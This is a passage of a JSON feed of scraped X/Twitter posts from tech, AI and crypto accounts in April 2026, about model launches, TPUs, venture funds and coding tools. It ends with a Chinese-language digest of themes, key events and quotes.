:https://claw.163.com/?channel=gkxspace\n邀请码:CLAW0799450B9EF5\n\n可以使用两百次,大家快配置一下", + "url": "https://x.com/gkxspace/status/2047640751774060771", + "published_at": "2026-04-24T11:36:13+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 给大家科普一下现在GPT-Image-2的低价渠道\n\n第一种就是ChatGPT直充,Free号不能使用,只有 Plus 和 Pro 能够使用。这里我直接推荐两个渠道:\n\n1. 各自小店\nhttp://caowo.store \n这个店是我看到的比较便宜的,注意,这个渠道的号没有质保,随时会掉,比较便宜但是不稳定\n\n2. Gamsgo\nhttps://www.gamsgo.com/partner/9GRtg\n这个渠道做的比较大,里面的ChatGPT号有独享和共享的模式,是官方充值开的,比较稳定。\n\n第二种是逆向渠道\n\n这种是直接逆向的Codex的接口,价格不固定,普遍在1分到6分钱之间\n\n1. apimart\nhttps://apimart.ai 4分钱一张\n\n2. http://dragoncode.codes\n我自己的站,明天上线Image-2,第一周定价为3分钱一张。", + "url": "https://x.com/bozhou_ai/status/2047639906030383159", + "published_at": "2026-04-24T11:32:51+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "SBF 的投资水平:Anthropic、Cursor、SpaceX\n\nCZ 的投资水平:SBF", + "url": "https://x.com/wolfyxbt/status/2047585341515993543", + "published_at": "2026-04-24T07:56:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://x.com/naval/status/2047550896670908809", + "published_at": "2026-04-24T05:39:10+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://x.com/naval/status/2047546920747307466", + "published_at": "2026-04-24T05:23:22+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://x.com/liuliu/status/2047527371486658814", + "published_at": "2026-04-24T04:05:41+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "看到此推的所有人,现在立刻马上推荐我一个生活好物。", + "url": "https://x.com/wolfyxbt/status/2047524944280793505", + "published_at": "2026-04-24T03:56:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://x.com/naval/status/2047520212787015748", + "published_at": "2026-04-24T03:37:14+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "R to @Stv_Lynn: api-docs.deepseek.com/zh-cn/…", + "url": "https://x.com/Stv_Lynn/status/2047520184408371233", + "published_at": "2026-04-24T03:37:07+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "DeepSeek V4 支持了 FIM,也就是在一段文本的中间进行补全\n很适合代码场景", + "url": "https://x.com/Stv_Lynn/status/2047520130499051872", + "published_at": "2026-04-24T03:36:54+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://x.com/naval/status/2047519250433421604", + "published_at": "2026-04-24T03:33:25+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "claude 接入 Deepseek教程\n\n第一步: https://platform.deepseek.com/api_keys\n创建apikey\n\n第二步: 在cc Switch里面创建供应商,请求地址为 \nhttps://api.deepseek.com/anthropic\nAPIKEY 填写刚刚创建的\n\n第三步更改一下模型\n点击高级选项,然后主模型 deepseek-v4-pro haiku为 deepseek-v4-flash", + "url": "https://x.com/bozhou_ai/status/2047514776612556933", + "published_at": "2026-04-24T03:15:38+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "DeepSeek V4 终于生了!", + "url": "https://x.com/Stv_Lynn/status/2047513252171825530", + "published_at": "2026-04-24T03:09:34+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "价格屠夫,参数是真能打", + "url": "https://x.com/bozhou_ai/status/2047511335995596887", + "published_at": "2026-04-24T03:01:58+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://x.com/naval/status/2047510419565420779", + "published_at": "2026-04-24T02:58:19+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "DeepseekV4 API这次好像真出来了\nhttps://api-docs.deepseek.com/zh-cn/quick_start/pricing", + "url": "https://x.com/bozhou_ai/status/2047510299658670237", + "published_at": "2026-04-24T02:57:50+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "如果自己要做自媒体,打造个人影响力,我觉得博客系统还是很有必要搭建一下的,特别是对于不懂技术的朋友,这个极速搭建的系统可以快速帮我们拥有一个自己博客网站", + "url": "https://x.com/bozhou_ai/status/2047501631990947985", + "published_at": "2026-04-24T02:23:24+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "歸藏大佬的 PPT SKill 终于来了,审美依旧没对手,可以吧之前的 PPT SKill 换掉了\n\n配合刚出的 GPT5.5 和 新版 Codex,简直无敌\n\nhttps://github.com/op7418/guizang-ppt-skill", + "url": "https://x.com/gkxspace/status/2047494444857913663", + "published_at": "2026-04-24T01:54:50+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://x.com/eladgil/status/2047489459378397604", + "published_at": "2026-04-24T01:35:02+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。", + "url": "https://x.com/svwang1/status/2047472537488302502", + "published_at": "2026-04-24T00:27:47+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。", + "url": "https://x.com/svwang1/status/2047470402725921150", + "published_at": "2026-04-24T00:19:18+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://x.com/eladgil/status/2047421448449630379", + "published_at": "2026-04-23T21:04:47+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://x.com/JeffDean/status/2047408945950802186", + "published_at": "2026-04-23T20:15:06+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://x.com/JeffDean/status/2047407537566495033", + "published_at": "2026-04-23T20:09:30+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://x.com/JeffDean/status/2047405389856297387", + "published_at": "2026-04-23T20:00:58+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://x.com/JeffDean/status/2047403921912873257", + "published_at": "2026-04-23T19:55:08+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://x.com/liuliu/status/2047374234004115719", + "published_at": "2026-04-23T17:57:10+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://x.com/eladgil/status/2047373700643844303", + "published_at": "2026-04-23T17:55:03+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://x.com/eladgil/status/2047365014500389353", + "published_at": "2026-04-23T17:20:32+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://x.com/eladgil/status/2047364865527075139", + "published_at": "2026-04-23T17:19:56+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://x.com/JeffDean/status/2047339995682529313", + "published_at": "2026-04-23T15:41:07+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "福利姬宝宝们,快点出来,\n\n集合了,来这个评论区集合,我有重要事情要宣布。", + "url": "https://x.com/wolfyxbt/status/2047299964158787623", + "published_at": "2026-04-23T13:02:03+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "R to @gkxspace: https://claw.163.com/?channel=gkxspace\n现在可以报名内测,通过这个可以很快通过", + "url": "https://x.com/gkxspace/status/2047292526759931980", + "published_at": "2026-04-23T12:32:29+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "x.com/i/article/204728945783…", + "url": "https://x.com/gkxspace/status/2047291569565303239", + "published_at": "2026-04-23T12:28:41+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "有时候真的很敬佩打狗的 P 小将\n\n你只要经常去扫链,先不说能不能赚钱,但你绝对能看到这个行业内最快最早的信息源(排除一些内部人士能提前知道的信息)。很多都是一些官方都还没发布的东西、还没上线的产品,或者是一些藏在文档和代码里的蛛丝马迹,都能给这些 P 小将给提前扒出来发个币。", + "url": "https://x.com/wolfyxbt/status/2047286333505515554", + "published_at": "2026-04-23T12:07:53+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "R to @0xAA_Science: 已经修复了", + "url": "https://x.com/0xAA_Science/status/2047257535598706937", + "published_at": "2026-04-23T10:13:27+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "群友反应币安钱包看不到资产,我确认了下,的确显示异常。\n但是区块浏览器能看到资金,说明不是被盗,应该是币安钱包的节点/数据服务出了问题,资产安全,大家不要担心!\n@BinanceWallet @heyibinance @cz_binance", + "url": "https://x.com/0xAA_Science/status/2047250882287526158", + "published_at": "2026-04-23T09:47:01+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "下次香港开会可以约个休闲篮球局? 🏀", + "url": "https://x.com/0xAA_Science/status/2047222936923525438", + "published_at": "2026-04-23T07:55:58+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "RT by @Stv_Lynn: GPT Image 2 is insanely good...I generated a 360° equirectangular panorama in Happycapy with just a skill + prompt. \n\nStep 1: Select the generate-image skill \n\nStep 2: Enter a prompt like: “Use a frontend 360 viewer to display an equirectangular image of […] using the GPT-Image-2 model.” \n\nWanna see how you all get creative with this", + "url": "https://x.com/Stv_Lynn/status/2047214663721681288", + "published_at": "2026-04-23T07:23:05+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://x.com/soumithchintala/status/2047191747793649805", + "published_at": "2026-04-23T05:52:02+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.", + "url": "https://x.com/AravSrinivas/status/2047145172337836139", + "published_at": "2026-04-23T02:46:57+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://x.com/CryptoCred/status/2047079463750377958", + "published_at": "2026-04-22T22:25:51+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://x.com/eladgil/status/2047052737762980083", + "published_at": "2026-04-22T20:39:39+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. \n\nUnlike our previous post trained models, this model has been trained to be good at search and tool calls simultaneously, allowing us to unify the tool call router and summarization together in one model. \n\nThe resulting model performs better than GPT and Sonnet in terms of cost efficiency to serve daily Perplexity queries in production. The production model runs on our own inference platform.\n\nWe’re already serving a significant chunk of our daily traffic with this model and intend to have it serve all of default traffic pretty soon. \n\nMore research to follow soon on models we’re training and deploying for Comet and Computer.", + "url": "https://x.com/AravSrinivas/status/2047019688920756504", + "published_at": "2026-04-22T18:28:20+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers.\n\nOur SFT + RL pipeline improves search, citation quality, instruction following, and efficiency.\n\nWith Qwen models, we match or beat GPT models on factuality at a lower cost.", + "url": "https://x.com/AravSrinivas/status/2047016400292839808", + "published_at": "2026-04-22T18:15:16+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "\"Self-control is empathy with your future self.\" - Seinfeld", + "url": "https://x.com/morganhousel/status/2047013991046881663", + "published_at": "2026-04-22T18:05:41+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Mention @​Cursor to kick off tasks in Slack and see updates of its work streaming in real time.\n\nCursor uses context in the thread and broader channels to create a PR for you to review and ship.", + "url": "https://x.com/cursor_ai/status/2047000517751288303", + "published_at": "2026-04-22T17:12:09+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Add Cursor to Slack: http://cursor.com/api/install-slack-app", + "url": "https://x.com/cursor_ai/status/2047000519043141766", + "published_at": "2026-04-22T17:12:09+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://x.com/naval/status/2046991137022648800", + "published_at": "2026-04-22T16:34:52+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://x.com/liuliu/status/2046986486629986435", + "published_at": "2026-04-22T16:16:24+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see.\n\n@eddiejiao_obj, @drewocarr and I built a prototype to see how this could actually work, and set out to make it real. We're calling it Flipbook. (1/5)", + "url": "https://x.com/karpathy/status/2046982383430496444", + "published_at": "2026-04-22T16:00:05+00:00", + "source": "nitter" + }, + { + "handle": "Stv_Lynn", + "account": "@Stv_Lynn", + "name": "Steven Lynn", + "title": "再这样下去 image2 估计很快就要被玩坏了\n后面说不定要像 sora 一样加很多限制", + "url": "https://x.com/Stv_Lynn/status/2046968345170526386", + "published_at": "2026-04-22T15:04:18+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "最近看到一个 AI x 预测市场的项目,UniPat AI @UniPat_AI ,把预测做成了可对比、可验证的一套系统。\n\n我找创始人聊了下:\n1. 预测市场很火,但是能用 AI 精准预测的项目很少,而他们在这一方面走在了前面。\n2. 目前框架已经搭好,并且推出了 Echo 模型,目前在 benchmark 上排第一,和真实市场对比也有优势(对标 Polymarket 胜率 63.2%)。\n3. 会发币吗? 不会,打算通过卖 API 来盈利\n\n做交易 / agent / 决策系统的,可以关注一下这个方向。", + "url": "https://x.com/0xAA_Science/status/2046939173710676227", + "published_at": "2026-04-22T13:08:23+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "用了两天志辉大佬开源的 skills-manage,好家伙,这个工具解决了我一个大痛点。\n\n以前我的 Skill 文件散落在各种地方,每次更新一个 Skill,得手动同步。\n\nskills-manage 用 ~/.agents/skills/ 做中央仓库,其他平台通过软链接指向这里。一处修改,全平台生效。\n\n并且:\n1. 可以从 GitHub 直接导入 Skill 仓库\n2. 支持 20+ 个 AI 编程工具(Claude Code、Cursor、Windsurf、Codex...)\n3. 有 Collection 功能,可以把常用 Skill 打包,一键安装到新平台\n4. 本地优先,数据都在本地 SQLite,不上传\n\n推荐给需要管理多个 AI 编程工具的朋友。\n\nGitHub: https://github.com/iamzhihuix/skills-manage", + "url": "https://x.com/gkxspace/status/2046938571395760307", + "published_at": "2026-04-22T13:06:00+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "x.com/i/article/204660489877…", + "url": "https://x.com/gkxspace/status/2046915506523783421", + "published_at": "2026-04-22T11:34:21+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "Macbook 的默认文件夹太丑了\n\n而且每个都长得一样,每次找起来都不太方便,我发现这个文件夹样式是可以自定义的,所以刚刚 Vibe 了一个可以给 Macbook 文件夹自定义样式的小工具,大家也可以用用 👇\n\n• 网站:https://wolfyxbt.github.io/iFolder\n\n这样看起来舒服多了,每次找起来也比较方便。", + "url": "https://x.com/wolfyxbt/status/2046892058909331482", + "published_at": "2026-04-22T10:01:10+00:00", + "source": "nitter" + } + ], + "headline": "OpenAI全云部署+Claude/MCP连接器爆发,AI编程工具生态进入\"agent网络\"新时代", + "top_themes": [ + { + "title": "其他", + "count": 351 + }, + { + "title": "模型能力", + "count": 114 + }, + { + "title": "交易与市场", + "count": 21 + }, + { + "title": "算力与芯片", + "count": 14 + }, + { + "title": "投融资与并购", + "count": 13 + } + ], + "modules": { + "headline": "OpenAI全云部署+Claude/MCP连接器爆发,AI编程工具生态进入\"agent网络\"新时代", + "themes": [ + { + "id": "t1", + "title": "AI 编程工具生态爆发:多连接器 + 多 Agent 协同", + "subtitle": "Cursor 3.2、Claude Blender/Fusion连接器、Mozilla统一接口同天上架,agent正在从单点工具进化为可协作的网络", + "bullets": [ + "Cursor 3.2发布:支持/multitask并行子Agent + 跨仓库多根工作区;GPT-5.5登顶CursorBench达72.8%,50%折扣持续至5月2日", + "Claude新增9个创意工具MCP:Blender、Autodesk Fusion、Adobe Creative Cloud、Ableton、Splice、Canva、Affinity、Sketchup、Resodium", + "Mozilla发布any-llm:统一接口连接所有LLM provider,挑战LiteLLM,发布首日即获1928 stars", + "前GitHub CTO团队开源Laguna:33B参数MoE模型,专为Agentic Coding设计,单GPU可运行" + ], + "samples": [ + { + "text": "Cursor 3.2支持/multitask并行子Agent,GPT-5.5登顶CursorBench", + "url": "https://x.com/cursor_ai/status/2047764651363180839", + "handle": "cursor_ai", + "date": "2026-04-24" + }, + { + "text": "Mozilla any-llm统一接口连接所有LLM provider", + "url": "https://x.com/GoSailGlobal/status/2049327853469310984", + "handle": "GoSailGlobal", + "date": "2026-04-29" + }, + { + "text": "Claude MCP连接器爆发:Blender/Fusion等9个创意工具上架", + "url": "https://x.com/berryxia/status/2049247904536428805", + "handle": "berryxia", + "date": "2026-04-28" + } + ] + }, + { + "id": "t2", + "title": "OpenAI全云部署 + 开源模型军备竞赛", + "subtitle": "微软合作升级解除云限制;Moonshot Kimi k2.6发布;NVIDIA Nemotron Omni开源;国产模型token价格战开打", + "bullets": [ + "OpenAI更新与微软合作:微软仍是主要云伙伴,但OpenAI产品现已可在所有云上使用", + "Perplexity将GPT-5.5设为默认编排模型,Kimi k2.6成开源SOTA;NVIDIA Nemotron 3 Nano Omni开源,30B参数支持5种模态", + "小米推出百万亿token补贴计划;罗福莉团队送100T tokens grant,表单对中文builder极友好" + ], + "samples": [ + { + "text": "OpenAI全云部署,解除微软绑定", + "url": "https://x.com/sama/status/2048755148361707946", + "handle": "sama", + "date": "2026-04-27" + }, + { + "text": "Perplexity用GPT-5.5编排,Kimi k2.6成开源SOTA", + "url": "https://x.com/AravSrinivas/status/2047753276888854595", + "handle": "AravSrinivas", + "date": "2026-04-27" + }, + { + "text": "NVIDIA Nemotron 3 Nano Omni开源:30B参数5模态Agent专用", + "url": "https://x.com/berryxia/status/2049253021159403786", + "handle": "berryxia", + "date": "2026-04-28" + } + ] + }, + { + "id": "t3", + "title": "AI投资与生存指南:vc视角的务实判断", + "subtitle": "Paul Graham:避开前沿实验室的\"blast radius\";Marc Andreessen:AI是文明知识的镜像而非外星机器智能", + "bullets": [ + "Paul Graham:前沿实验室确实在高速发布,但初创公司可以避开它们的攻击范围,关键在于选择正确的细分领域", + "Marc Andreessen:预期的AI是血腥的外星机器智能,实际得到的AI是我们文明知识和文化的全面镜像,当然会深深爱上它", + "Harry Stebbings:单纯裁员不能解决问题,文化和人才质量才是核心,需全体系重建" + ], + "samples": [ + { + "text": "PG对创始人建议:避开前沿实验室攻击范围", + "url": "https://x.com/paulg/status/2049333482271260710", + "handle": "paulg", + "date": "2026-04-29" + }, + { + "text": "Marc Andreessen:AI是文明知识的镜像", + "url": "https://x.com/pmarca/status/2049193915249574141", + "handle": "pmarca", + "date": "2026-04-28" + }, + { + "text": "Harry Stebbings:裁员不能解决问题,需重建文化和人才", + "url": "https://x.com/HarryStebbings/status/2049278741583643076", + "handle": "HarryStebbings", + "date": "2026-04-29" + } + ] + } + ], + "p0_events": [ + { + "id": "p04", + "title": "Warp终端正式开源", + "meta": "berryxia | 2026-04-28", + "summary": "知名现代终端Warp宣布全面开源,GitHub/Roadmap/贡献流程全开放,OpenAI Devs担任founding sponsor", + "url": "https://x.com//status/2049254052840812960" + }, + { + "id": "p05", + "title": "AgentSkillsHub索引67,196个项目:基尼系数0.983创纪录", + "meta": "GoSailGlobal | 2026-04-29", + "summary": "索引GitHub上所有Claude Skill/MCP/开源Agent工具,54.1%项目零star,Top 1%占83% stars,2026年3月新增27,720个项目是2024年月均45倍", + "url": "https://x.com//status/2049415194372342164" + } + ], + "top_quotes": [ + { + "id": "q3", + "quote": "GPT-5.5 is now available in Cursor! It's currently the top model on CursorBench at 72.8%.", + "speaker": "Cursor", + "date": "2026-04-24", + "note": "GPT-5.5在Cursor编程助手登顶评测榜,CursorBench 72.8%", + "url": 